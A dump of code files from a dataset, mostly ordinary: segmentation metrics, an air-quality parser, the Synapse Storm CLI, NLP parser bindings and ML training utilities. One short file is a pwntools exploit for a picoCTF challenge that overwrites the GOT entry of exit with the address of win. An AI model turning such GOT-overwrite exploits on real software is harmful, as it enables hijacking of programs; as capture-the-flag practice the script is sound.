] | null | null | null |
import os
import argparse
import logging
import numpy as np
import SimpleITK as sitk
logging.basicConfig(level=logging.INFO)
from tqdm import tqdm
import cv2
import sys
from PIL import Image
from sklearn import metrics
def Accuracy(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
accuracy = (TP + TN)/float(TP + TN + FP + FN)
return accuracy
def Dice(y_true, y_pred):
"""Returns Dice Similarity Coefficient for ground truth and predicted masks."""
#print(y_true.dtype)
#print(y_pred.dtype)
y_true = np.squeeze(y_true)/255
y_pred = np.squeeze(y_pred)/255
y_true.astype('bool')
y_pred.astype('bool')
intersection = np.logical_and(y_true, y_pred).sum()
return ((2. * intersection.sum()) + 1.) / (y_true.sum() + y_pred.sum() + 1.)
def IoU(Gi,Si):
#print(Gi.shape, Si.shape)
Gi = np.squeeze(Gi)/255
Si = np.squeeze(Si)/255
Gi.astype('bool')
Si.astype('bool')
intersect = 1.0*np.sum(np.logical_and(Gi,Si))
union = 1.0*np.sum(np.logical_or(Gi,Si))
return intersect/union
def Sensitivity(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
sensitivity = TP/float(TP + FN)
return sensitivity
def Specificity(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
specificity = TN/float(TN+FP)
return specificity
def main():
parser = argparse.ArgumentParser(description='ELM line segmentation')
parser.add_argument('--label_dir', type=str, default='/home/vivek/Music/demo/stack/seg',
help='folder of test label')
parser.add_argument('--pred_dir', type=str, default='/home/vivek/Music/demo/stack/pred',
help='folder of pred masks')
args = parser.parse_args()
labels = [os.path.join(args.label_dir, x) for x in os.listdir(os.path.join(args.label_dir)) if 'raw' not in x]
preds = [os.path.join(args.pred_dir, x) for x in os.listdir(os.path.join(args.pred_dir)) if 'raw' not in x]
mean_dice = []
mean_iou = []
mean_sensitivity = []
mean_specificity = []
mean_accuracy = []
for l, p in zip(labels, preds):
logging.info("Process %s and %s" % (p, l))
G = sitk.GetArrayFromImage(sitk.ReadImage(l))
S = sitk.GetArrayFromImage(sitk.ReadImage(p))
mean_accuracy.append(Accuracy(G, S))
mean_dice.append(Dice(G, S))
mean_iou.append(IoU(G, S))
mean_sensitivity.append(Sensitivity(G, S))
mean_specificity.append(Specificity(G, S))
print ('Mean_Accuracy = ', np.mean(np.array(mean_accuracy)))
print ('Mean_Dice = ', np.mean(np.array(mean_dice)))
print ('Mean_IoU = ', np.mean(np.array(mean_iou)))
print ('Mean_Sensitivity = ', np.mean(np.array(mean_sensitivity)))
print ('Mean_Specificity = ', np.mean(np.array(mean_specificity)))
if __name__ == '__main__':
main()
| 35.556701 | 114 | 0.643665 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 456 | 0.132212 |
f1db626c6c51f4c9710e0e6d1e887229859a9043
| 2,757 |
py
|
Python
|
src/app/parser/parser.py
|
IliaValov/SofiaAirPurity
|
71d0b005a9f8f5bfabfae99d1f4f8e1d11825adf
|
[
"MIT"
] | null | null | null |
src/app/parser/parser.py
|
IliaValov/SofiaAirPurity
|
71d0b005a9f8f5bfabfae99d1f4f8e1d11825adf
|
[
"MIT"
] | 1 |
2021-12-02T23:20:51.000Z
|
2021-12-02T23:20:51.000Z
|
src/app/parser/parser.py
|
IliaValov/SofiaAirPurity
|
71d0b005a9f8f5bfabfae99d1f4f8e1d11825adf
|
[
"MIT"
] | 1 |
2022-01-10T15:18:27.000Z
|
2022-01-10T15:18:27.000Z
|
from app.models.enums.station import Station
class Parser:
def __init__(self, data):
self.data = data
def getDataByStation(self, station):
airDataForStation = {"timeSet": [], "level": [], "airType": [], "invalid": []}
for d in self.data:
if int(d.station) == station:
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["airType"].append(int(d.airType))
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
def getDataByStationAndPolluter(self, station, polluter):
airDataForStation = {"timeSet": [], "level": [], "invalid": []}
for d in self.data:
if int(d.station) == station and int(d.airType) == polluter:
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
def getDataByStationAndLevel(self, station, levelStart, levelEnd):
airDataForStation = {"timeSet": [], "level": [], "invalid": []}
for d in self.data:
if int(d.station) == station and levelStart <= levelEnd and levelStart <= float(d.level) and float(d.level) <= levelEnd:
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
def getDataByTimeSet(self, start, end):
airDataForStation = {"station": [], "timeSet": [], "level": [], "airType": [], "invalid": []}
for d in self.data:
if start <= end and start <= d.timeset and d.timeset <= end:
airDataForStation["station"].append(int(d.station))
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["airType"].append(int(d.airType))
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
def getDataByStationAndTimeSet(self, station, start, end):
airDataForStation = {"timeSet": [], "level": [], "airType": [], "invalid": []}
for d in self.data:
if int(d.station) == station and start <= end and start <= d.timeset and d.timeset <= end:
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["airType"].append(int(d.airType))
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
| 50.127273 | 132 | 0.602466 | 2,710 | 0.982952 | 0 | 0 | 0 | 0 | 0 | 0 | 322 | 0.116794 |
f1dc37b00019bdcd4fd7800d93e149be0dfe2bdf
| 11,747 |
py
|
Python
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 216 |
2017-01-17T18:52:50.000Z
|
2022-03-31T18:44:49.000Z
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 2,189 |
2017-01-17T22:31:48.000Z
|
2022-03-31T20:41:45.000Z
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 44 |
2017-01-17T16:50:57.000Z
|
2022-03-16T18:35:52.000Z
|
import os
import sys
import copy
import asyncio
import logging
import argparse
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.telepath as s_telepath
import synapse.lib.cli as s_cli
import synapse.lib.cmd as s_cmd
import synapse.lib.node as s_node
import synapse.lib.time as s_time
import synapse.lib.output as s_output
import synapse.lib.parser as s_parser
import synapse.lib.msgpack as s_msgpack
logger = logging.getLogger(__name__)
ERROR_COLOR = '#ff0066'
WARNING_COLOR = '#f4e842'
NODEEDIT_COLOR = "lightblue"
welcome = '''
Welcome to the Storm interpreter!
Local interpreter (non-storm) commands may be executed with a ! prefix:
Use !quit to exit.
Use !help to see local interpreter commands.
'''
class QuitCmd(s_cli.CmdQuit):
'''
Quit the current command line interpreter.
Example:
!quit
'''
_cmd_name = '!quit'
class HelpCmd(s_cli.CmdHelp):
'''
List interpreter extended commands and display help output.
Example:
!help foocmd
'''
_cmd_name = '!help'
class StormCliCmd(s_cli.Cmd):
# cut the Cmd instance over to using argparser and cmdrargv split
def getArgParser(self):
desc = self.getCmdDoc()
pars = s_cmd.Parser(prog=self._cmd_name, description=desc, outp=self._cmd_cli.outp)
return pars
def getCmdOpts(self, text):
pars = self.getArgParser()
argv = s_parser.Parser(text).cmdrargs()
return pars.parse_args(argv[1:])
class RunFileCmd(StormCliCmd):
'''
Run a local storm file.
Example:
!runfile /path/to/file.storm
'''
_cmd_name = '!runfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('stormfile', help='A local file containing a storm query.')
return pars
async def runCmdOpts(self, opts):
if not os.path.isfile(opts.stormfile):
self.printf(f'no such file: {opts.stormfile}')
return
with open(opts.stormfile, 'rb') as fd:
text = fd.read().decode()
self.printf(f'running storm file: {opts.stormfile}')
await self._cmd_cli.storm(text)
class PushFileCmd(StormCliCmd):
'''
Upload a file and create a file:bytes node.
Example:
!pushfile /path/to/file
'''
_cmd_name = '!pushfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('filepath', help='A local file to push to the Cortex.')
return pars
async def runCmdOpts(self, opts):
if not os.path.isfile(opts.filepath):
self.printf(f'no such file: {opts.filepath}')
return
self.printf(f'uploading file: {opts.filepath}')
async with await self._cmd_cli.item.getAxonUpload() as upload:
with open(opts.filepath, 'rb') as fd:
byts = fd.read(10000000)
while byts:
await upload.write(byts)
byts = fd.read(10000000)
size, sha256 = await upload.save()
opts = {'vars': {
'sha256': s_common.ehex(sha256),
'name': os.path.basename(opts.filepath),
}}
await self._cmd_cli.storm('[ file:bytes=$sha256 ] { -:name [:name=$name] }', opts=opts)
class PullFileCmd(StormCliCmd):
'''
Download a file by sha256 and store it locally.
Example:
!pullfile c00adfcc316f8b00772cdbce2505b9ea539d74f42861801eceb1017a44344ed3 /path/to/savefile
'''
_cmd_name = '!pullfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('sha256', help='The SHA256 of the file to download.')
pars.add_argument('filepath', help='The file path to save the downloaded file to.')
return pars
async def runCmdOpts(self, opts):
self.printf(f'downloading sha256: {opts.sha256}')
try:
with s_common.genfile(opts.filepath) as fd:
async for byts in self._cmd_cli.item.getAxonBytes(opts.sha256):
byts = fd.write(byts)
self.printf(f'saved to: {opts.filepath}')
except asyncio.CancelledError as e:
raise
except s_exc.SynErr as e:
self.printf(e.errinfo.get('mesg', str(e)))
class ExportCmd(StormCliCmd):
'''
Export the results of a storm query into a nodes file.
Example:
// Export nodes to a file
!export dnsa.nodes { inet:fqdn#mynodes -> inet:dns:a }
// Export nodes to a file and only include specific tags
!export fqdn.nodes { inet:fqdn#mynodes } --include-tags footag
'''
_cmd_name = '!export'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('filepath', help='The file path to save the export to.')
pars.add_argument('query', help='The Storm query to export nodes from.')
pars.add_argument('--include-tags', nargs='*', help='Only include the specified tags in output.')
pars.add_argument('--no-tags', default=False, action='store_true', help='Do not include any tags on exported nodes.')
return pars
async def runCmdOpts(self, opts):
self.printf(f'exporting nodes')
queryopts = {}
if opts.include_tags:
queryopts['scrub'] = {'include': {'tags': opts.include_tags}}
if opts.no_tags:
queryopts['scrub'] = {'include': {'tags': []}}
try:
query = opts.query[1:-1]
with s_common.genfile(opts.filepath) as fd:
cnt = 0
async for pode in self._cmd_cli.item.exportStorm(query, opts=queryopts):
byts = fd.write(s_msgpack.en(pode))
cnt += 1
self.printf(f'saved {cnt} nodes to: {opts.filepath}')
except asyncio.CancelledError as e:
raise
except s_exc.SynErr as e:
self.printf(e.errinfo.get('mesg', str(e)))
class StormCli(s_cli.Cli):
histfile = 'storm_history'
async def __anit__(self, item, outp=s_output.stdout, opts=None):
await s_cli.Cli.__anit__(self, item, outp=outp)
self.indented = False
self.cmdprompt = 'storm> '
self.stormopts = {'repr': True}
self.hidetags = False
self.hideprops = False
self._print_skips = []
def initCmdClasses(self):
self.addCmdClass(QuitCmd)
self.addCmdClass(HelpCmd)
self.addCmdClass(ExportCmd)
self.addCmdClass(RunFileCmd)
self.addCmdClass(PullFileCmd)
self.addCmdClass(PushFileCmd)
def printf(self, mesg, addnl=True, color=None):
if self.indented:
s_cli.Cli.printf(self, '')
self.indented = False
return s_cli.Cli.printf(self, mesg, addnl=addnl, color=color)
async def runCmdLine(self, line, opts=None):
if line[0] == '!':
return await s_cli.Cli.runCmdLine(self, line)
await self.storm(line, opts=opts)
async def handleErr(self, mesg):
err = mesg[1]
if err[0] == 'BadSyntax':
pos = err[1].get('at', None)
text = err[1].get('text', None)
tlen = len(text)
mesg = err[1].get('mesg', None)
if pos is not None and text is not None and mesg is not None:
text = text.replace('\n', ' ')
# Handle too-long text
if tlen > 60:
text = text[max(0, pos - 30):pos + 30]
if pos < tlen - 30:
text += '...'
if pos > 30:
text = '...' + text
pos = 33
self.printf(text)
self.printf(f'{" " * pos}^')
self.printf(f'Syntax Error: {mesg}', color=ERROR_COLOR)
return
text = err[1].get('mesg', err[0])
self.printf(f'ERROR: {text}', color=ERROR_COLOR)
def _printNodeProp(self, name, valu):
self.printf(f' {name} = {valu}')
async def storm(self, text, opts=None):
realopts = copy.deepcopy(self.stormopts)
if opts is not None:
realopts.update(opts)
async for mesg in self.item.storm(text, opts=realopts):
mtyp = mesg[0]
if mtyp in self._print_skips:
continue
if mtyp == 'node':
node = mesg[1]
formname, formvalu = s_node.reprNdef(node)
self.printf(f'{formname}={formvalu}')
if not self.hideprops:
for name in sorted(s_node.props(node).keys()):
valu = s_node.reprProp(node, name)
if name[0] != '.':
name = ':' + name
self._printNodeProp(name, valu)
if not self.hidetags:
for tag in sorted(s_node.tagsnice(node)):
valu = s_node.reprTag(node, tag)
tprops = s_node.reprTagProps(node, tag)
printed = False
if valu:
self.printf(f' #{tag} = {valu}')
printed = True
if tprops:
for prop, pval in tprops:
self.printf(f' #{tag}:{prop} = {pval}')
printed = True
if not printed:
self.printf(f' #{tag}')
elif mtyp == 'node:edits':
edit = mesg[1]
count = sum(len(e[2]) for e in edit.get('edits', ()))
s_cli.Cli.printf(self, '.' * count, addnl=False, color=NODEEDIT_COLOR)
self.indented = True
elif mtyp == 'fini':
took = mesg[1].get('took')
took = max(took, 1)
count = mesg[1].get('count')
pers = float(count) / float(took / 1000)
self.printf('complete. %d nodes in %d ms (%d/sec).' % (count, took, pers))
elif mtyp == 'print':
self.printf(mesg[1].get('mesg'))
elif mtyp == 'warn':
info = mesg[1]
warn = info.pop('mesg', '')
xtra = ', '.join([f'{k}={v}' for k, v in info.items()])
if xtra:
warn = ' '.join([warn, xtra])
self.printf(f'WARNING: {warn}', color=WARNING_COLOR)
elif mtyp == 'err':
await self.handleErr(mesg)
def getArgParser():
pars = argparse.ArgumentParser(prog='synapse.tools.storm')
pars.add_argument('cortex', help='A telepath URL for the Cortex.')
pars.add_argument('onecmd', nargs='?', help='A single storm command to run and exit.')
return pars
async def main(argv, outp=s_output.stdout):
pars = getArgParser()
opts = pars.parse_args(argv)
path = s_common.getSynPath('telepath.yaml')
telefini = await s_telepath.loadTeleEnv(path)
async with await s_telepath.openurl(opts.cortex) as proxy:
if telefini is not None:
proxy.onfini(telefini)
async with await StormCli.anit(proxy, outp=outp, opts=opts) as cli:
if opts.onecmd:
await cli.runCmdLine(opts.onecmd)
return
# pragma: no cover
cli.colorsenabled = True
cli.printf(welcome)
await cli.addSignalHandlers()
await cli.runCmdLoop()
if __name__ == '__main__': # pragma: no cover
sys.exit(asyncio.run(main(sys.argv[1:])))
| 29.589421 | 125 | 0.556823 | 9,937 | 0.845918 | 0 | 0 | 0 | 0 | 7,154 | 0.609007 | 2,665 | 0.226866 |
f1dcbdb70b490e3b7a9741698dbd0c921ce6d7ff
| 374 |
py
|
Python
|
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | null | null | null |
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | null | null | null |
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | 1 |
2021-02-09T12:22:55.000Z
|
2021-02-09T12:22:55.000Z
|
from sklearn.feature_selection import VarianceThreshold
# Create feature matrix with:
# Feature 0: 80% class 0
# Feature 1: 80% class 1
# Feature 2: 60% class 0, 40% class 1
X = [[0, 1, 0],
[0, 1, 1],
[0, 1, 0],
[0, 1, 1],
[1, 0, 0]]
# Run threshold by variance
thresholder = VarianceThreshold(threshold=(.75 * (1 - .75)))
thresholder.fit_transform(X)
| 23.375 | 60 | 0.628342 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 141 | 0.377005 |
f1dd06b091ae6fa97dc90f3e28bc1d5770af8082
| 1,677 |
py
|
Python
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 157 |
2019-05-11T21:17:20.000Z
|
2022-03-21T12:05:12.000Z
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 10 |
2019-05-14T19:49:04.000Z
|
2021-06-03T13:15:16.000Z
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 20 |
2019-08-21T12:40:51.000Z
|
2021-10-02T15:06:07.000Z
|
#!/usr/bin/python3
import sys
sys.path.insert(0, '../..') # make '..' first in the lib search path
import gzip
import numpy
from lemminflect.kmodels.ModelLemma import ModelLemma
from lemminflect.kmodels.ModelLemmaInData import ModelLemmaInData
from lemminflect.kmodels.ModelLemmaClasses import ModelLemmaClasses
from lemminflect import config
if __name__ == '__main__':
# Load the lemmatization data
print('Loading ', config.lemma_tcorp_fn)
indata = ModelLemmaInData(config.lemma_tcorp_fn)
print('Loaded {:,} entries'.format(len(indata.entries)))
# Load the lemmatization rules
print('Loading ', config.model_lemma_cl_fn)
rules = ModelLemmaClasses(config.model_lemma_cl_fn)
# Convert data into training format
X = []
Y = []
input_len = ModelLemmaInData.WVEC_LEN
input_letters = ModelLemmaInData.getLetterClasses()
output_rules = rules.rules
for entry in indata.entries:
rule = ModelLemmaClasses.computeSuffixRule(entry.infl, entry.lemma)
idx = rules.getRuleIndex(rule)
vec = ModelLemmaInData.wordToVec(entry.infl, entry.category)
X.append( vec )
Y.append( idx )
X = numpy.asarray(X, dtype='float32')
Y = numpy.asarray(Y, dtype='int32')
print('X.shape= ', X.shape)
print('Y.shape= ', Y.shape)
print()
# Create the model
batch_size = 32
nepochs = 50
model = ModelLemma()
model.create(input_len, input_letters, output_rules)
model.model.summary()
model.train(X, Y, batch_size, nepochs)
print()
print('Saving model to ', config.model_lemma_fn)
model.save(config.model_lemma_fn)
print('done')
| 31.641509 | 75 | 0.690519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 290 | 0.172928 |
f1dd06cdb53d42d5c3f71ef66179e31f525e4e55
| 9,006 |
py
|
Python
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 14 |
2019-04-17T15:10:39.000Z
|
2022-02-14T09:38:47.000Z
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4 |
2019-04-07T19:36:24.000Z
|
2020-05-28T12:46:37.000Z
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 43 |
2019-04-20T07:31:57.000Z
|
2022-01-12T16:24:13.000Z
|
# coding=utf-8
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
from _ctypes import byref, pointer
from builtins import range, str
from ctypes import c_char_p, string_at
from snips_nlu_parsers.utils import (CStringArray, check_ffi_error, lib,
string_array_pointer, string_pointer)
_ALL_LANGUAGES = None
_SUPPORTED_ENTITIES = dict()
_SUPPORTED_GAZETTEER_ENTITIES = dict()
_SUPPORTED_GRAMMAR_ENTITIES = dict()
_ENTITIES_EXAMPLES = dict()
_ALL_BUILTIN_ENTITIES = None
_ALL_GAZETTEER_ENTITIES = None
_ALL_GRAMMAR_ENTITIES = None
_BUILTIN_ENTITIES_SHORTNAMES = dict()
_COMPLETE_ENTITY_ONTOLOGY = None
_LANGUAGE_ENTITY_ONTOLOGY = dict()
def get_all_languages():
"""Lists all the supported languages"""
global _ALL_LANGUAGES
if _ALL_LANGUAGES is None:
lib.snips_nlu_ontology_supported_languages.restype = CStringArray
array = lib.snips_nlu_ontology_supported_languages()
_ALL_LANGUAGES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_LANGUAGES
def get_all_builtin_entities():
"""Lists the builtin entities that are supported in at least one
language"""
global _ALL_BUILTIN_ENTITIES
if _ALL_BUILTIN_ENTITIES is None:
lib.snips_nlu_ontology_all_builtin_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_builtin_entities()
_ALL_BUILTIN_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_BUILTIN_ENTITIES
def get_all_gazetteer_entities():
"""Lists the gazetteer entities that are supported in at least one
language"""
global _ALL_GAZETTEER_ENTITIES
if _ALL_GAZETTEER_ENTITIES is None:
lib.snips_nlu_ontology_all_gazetteer_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_gazetteer_entities()
_ALL_GAZETTEER_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_GAZETTEER_ENTITIES
def get_all_grammar_entities():
"""Lists the grammar entities that are supported in at least one
language"""
global _ALL_GRAMMAR_ENTITIES
if _ALL_GRAMMAR_ENTITIES is None:
lib.snips_nlu_ontology_all_grammar_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_grammar_entities()
_ALL_GRAMMAR_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_GRAMMAR_ENTITIES
def get_builtin_entity_shortname(entity):
"""Get the short name of the entity
Examples:
>>> get_builtin_entity_shortname(u"snips/amountOfMoney")
'AmountOfMoney'
"""
global _BUILTIN_ENTITIES_SHORTNAMES
if entity not in _BUILTIN_ENTITIES_SHORTNAMES:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_ontology_entity_shortname(
entity.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"builtin entity shortname")
result = string_at(ptr)
_BUILTIN_ENTITIES_SHORTNAMES[entity] = result.decode("utf8")
return _BUILTIN_ENTITIES_SHORTNAMES[entity]
def get_supported_entities(language):
"""Lists the builtin entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_supported_builtin_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported entities")
array = ptr.contents
_SUPPORTED_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_ENTITIES[language]
def get_supported_gazetteer_entities(language):
"""Lists the gazetteer entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_GAZETTEER_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_GAZETTEER_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = \
lib.snips_nlu_parsers_supported_builtin_gazetteer_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported gazetteer entities")
array = ptr.contents
_SUPPORTED_GAZETTEER_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_GAZETTEER_ENTITIES[language]
def get_supported_grammar_entities(language):
"""Lists the grammar entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_GRAMMAR_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_GRAMMAR_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_supported_grammar_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported grammar entities")
array = ptr.contents
_SUPPORTED_GRAMMAR_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_GRAMMAR_ENTITIES[language]
def get_builtin_entity_examples(builtin_entity_kind, language):
"""Provides some examples of the builtin entity in the specified language
"""
global _ENTITIES_EXAMPLES
if not isinstance(builtin_entity_kind, str):
raise TypeError("Expected `builtin_entity_kind` to be of type 'str' "
"but found: %s" % type(builtin_entity_kind))
if not isinstance(language, str):
raise TypeError("Expected `language` to be of type 'str' but found: %s"
% type(language))
if builtin_entity_kind not in _ENTITIES_EXAMPLES:
_ENTITIES_EXAMPLES[builtin_entity_kind] = dict()
if language not in _ENTITIES_EXAMPLES[builtin_entity_kind]:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_builtin_entity_examples(
builtin_entity_kind.encode("utf8"),
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"builtin entity examples")
array = ptr.contents
_ENTITIES_EXAMPLES[builtin_entity_kind][language] = list(
array.data[i].decode("utf8") for i in range(array.size))
return _ENTITIES_EXAMPLES[builtin_entity_kind][language]
def get_complete_entity_ontology():
"""Lists the complete entity ontology for all languages in JSON format
"""
global _COMPLETE_ENTITY_ONTOLOGY
if _COMPLETE_ENTITY_ONTOLOGY is None:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_parsers_complete_entity_ontology_json(byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"complete entity ontology")
json_str = string_at(ptr).decode("utf8")
_COMPLETE_ENTITY_ONTOLOGY = json.loads(json_str, encoding="utf8")
return _COMPLETE_ENTITY_ONTOLOGY
def get_language_entity_ontology(language):
"""Lists the complete entity ontology for the specified language in JSON format
"""
global _LANGUAGE_ENTITY_ONTOLOGY
if language not in _LANGUAGE_ENTITY_ONTOLOGY:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_parsers_language_entity_ontology_json(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"language entity ontology")
json_str = string_at(ptr).decode("utf8")
_LANGUAGE_ENTITY_ONTOLOGY[language] = json.loads(json_str, encoding="utf8")
return _LANGUAGE_ENTITY_ONTOLOGY[language]
| 40.751131 | 87 | 0.67777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,953 | 0.216855 |
f1decafed3dd9912b1ab456a5f7d5b245e48033e
| 521 |
py
|
Python
|
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | 9 |
2021-04-20T15:28:36.000Z
|
2022-03-08T19:53:48.000Z
|
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | null | null | null |
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | 6 |
2021-06-24T03:25:21.000Z
|
2022-02-20T21:44:52.000Z
|
import os;os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')
import pwn
remote_binary = "/problems/got_5_c5119617c90aa544a639812dbc41e24e/vuln"
def segfault():
try:
pr = pwn.process(remote_binary)
elf = pwn.ELF(remote_binary, False)
print(elf.got)
pr.sendlineafter("Input address\n", str(elf.got["exit"]))
pr.sendlineafter("Input value?\n", str(elf.sym["win"]))
rsp = pr.readall(timeout=0.5)
print(rsp)
finally:
pr.close()
segfault()
| 27.421053 | 72 | 0.629559 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 118 | 0.226488 |
f1e15b839857a50eb242db9bce20dc2231b79a03
| 9,518 |
py
|
Python
|
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# *Author: Dezso Ribli*
"""
Util functions for training CNN on weak lesnsing maps.
Mostly data loaders and data generators with some
additional functionality.
"""
import numpy as np
# https://github.com/IntelPython/mkl_fft/issues/11
#np.fft.restore_all()
import cv2
import math
import os
def step_decay(epoch, base_lr, epochs_drop, drop=0.1):
"""Helper for step learning rate decay."""
lrate = base_lr
for epoch_drop in epochs_drop:
lrate *= math.pow(drop,math.floor(epoch/epoch_drop))
return lrate
def load_training_data(mapsize=512, grfized=False, exclude_fid=False,
dense_grid=False, random_split=False,
from_files=False):
"""Load data for different training scenarios."""
if not grfized and (not dense_grid) and (not random_split):
# the default data to loas
